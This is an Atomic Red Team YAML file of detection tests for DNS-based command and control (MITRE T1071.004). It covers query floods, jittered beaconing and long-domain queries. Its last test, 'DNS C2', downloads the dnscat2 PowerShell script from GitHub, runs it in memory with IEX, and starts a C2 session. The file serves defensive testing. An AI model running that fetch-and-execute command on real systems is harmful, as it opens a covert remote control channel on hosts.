4f48704ef8
Co-authored-by: Michael Haag <5632822+MHaggis@users.noreply.github.com>
122 lines
5.2 KiB
YAML
122 lines
5.2 KiB
YAML
attack_technique: T1071.004
|
|
display_name: 'Application Layer Protocol: DNS'
|
|
atomic_tests:
|
|
- name: DNS Large Query Volume
|
|
auto_generated_guid: 1700f5d6-5a44-487b-84de-bc66f507b0a6
|
|
description: |
|
|
This test simulates an infected host sending a large volume of DNS queries to a command and control server.
|
|
The intent of this test is to trigger threshold based detection on the number of DNS queries either from a single source system or to a single targe domain.
|
|
A custom domain and sub-domain will need to be passed as input parameters for this test to work. Upon execution, DNS information about the domain will be displayed for each callout.
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
query_type:
|
|
description: DNS query type
|
|
type: string
|
|
default: TXT
|
|
subdomain:
|
|
description: Subdomain prepended to the domain name
|
|
type: string
|
|
default: atomicredteam
|
|
query_volume:
|
|
description: Number of DNS queries to send
|
|
type: integer
|
|
default: 1000
|
|
domain:
|
|
description: Default domain to simulate against
|
|
type: string
|
|
default: 127.0.0.1.nip.io
|
|
executor:
|
|
command: |
|
|
for($i=0; $i -le #{query_volume}; $i++) { Resolve-DnsName -type "#{query_type}" "#{subdomain}-$(Get-Random -Minimum 1 -Maximum 999999).#{domain}" -QuickTimeout}
|
|
name: powershell
|
|
- name: DNS Regular Beaconing
|
|
auto_generated_guid: 3efc144e-1af8-46bb-8ca2-1376bb6db8b6
|
|
description: |
|
|
This test simulates an infected host beaconing via DNS queries to a command and control server at regular intervals over time.
|
|
This behaviour is typical of implants either in an idle state waiting for instructions or configured to use a low query volume over time to evade threshold based detection.
|
|
A custom domain and sub-domain will need to be passed as input parameters for this test to work. Upon execution, DNS information about the domain will be displayed for each callout.
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
runtime:
|
|
description: Time in minutes to run the simulation
|
|
type: integer
|
|
default: 30
|
|
domain:
|
|
description: Default domain to simulate against
|
|
type: string
|
|
default: 127.0.0.1.nip.io
|
|
subdomain:
|
|
description: Subdomain prepended to the domain name
|
|
type: string
|
|
default: atomicredteam
|
|
query_type:
|
|
description: DNS query type
|
|
type: string
|
|
default: TXT
|
|
c2_interval:
|
|
description: Seconds between C2 requests to the command and control server
|
|
type: integer
|
|
default: 30
|
|
c2_jitter:
|
|
description: Percentage of jitter to add to the C2 interval to create variance in the times between C2 requests
|
|
type: integer
|
|
default: 20
|
|
executor:
|
|
command: |
|
|
Set-Location "PathToAtomicsFolder"
|
|
.\T1071.004\src\T1071-dns-beacon.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type} -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}
|
|
name: powershell
|
|
- name: DNS Long Domain Query
|
|
auto_generated_guid: fef31710-223a-40ee-8462-a396d6b66978
|
|
description: |
|
|
This test simulates an infected host returning data to a command and control server using long domain names.
|
|
The simulation involves sending DNS queries that gradually increase in length until reaching the maximum length. The intent is to test the effectiveness of detection of DNS queries for long domain names over a set threshold.
|
|
Upon execution, DNS information about the domain will be displayed for each callout.
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
query_type:
|
|
description: DNS query type
|
|
type: string
|
|
default: TXT
|
|
subdomain:
|
|
description: Subdomain prepended to the domain name (should be 63 characters to test maximum length)
|
|
type: string
|
|
default: atomicredteamatomicredteamatomicredteamatomicredteamatomicredte
|
|
domain:
|
|
description: Default domain to simulate against
|
|
type: string
|
|
default: 127.0.0.1.nip.io
|
|
executor:
|
|
command: |
|
|
Set-Location "PathToAtomicsFolder"
|
|
.\T1071.004\src\T1071-dns-domain-length.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type}
|
|
name: powershell
|
|
- name: DNS C2
|
|
auto_generated_guid: e7bf9802-2e78-4db9-93b5-181b7bcd37d7
|
|
description: |
|
|
This will attempt to start a C2 session using the DNS protocol. You will need to have a listener set up and create DNS records prior to executing this command.
|
|
The following blogs have more information.
|
|
|
|
https://github.com/iagox86/dnscat2
|
|
|
|
https://github.com/lukebaggett/dnscat2-powershell
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
domain:
|
|
description: Domain Name configured to use DNS Server where your C2 listener is running
|
|
type: string
|
|
default: example.com
|
|
server_ip:
|
|
description: IP address of DNS server where your C2 listener is running
|
|
type: string
|
|
default: 127.0.0.1
|
|
executor:
|
|
command: |
|
|
IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/45836819b2339f0bb64eaf294f8cc783635e00c6/dnscat2.ps1')
|
|
Start-Dnscat2 -Domain #{domain} -DNSServer #{server_ip}
|
|
name: powershell
|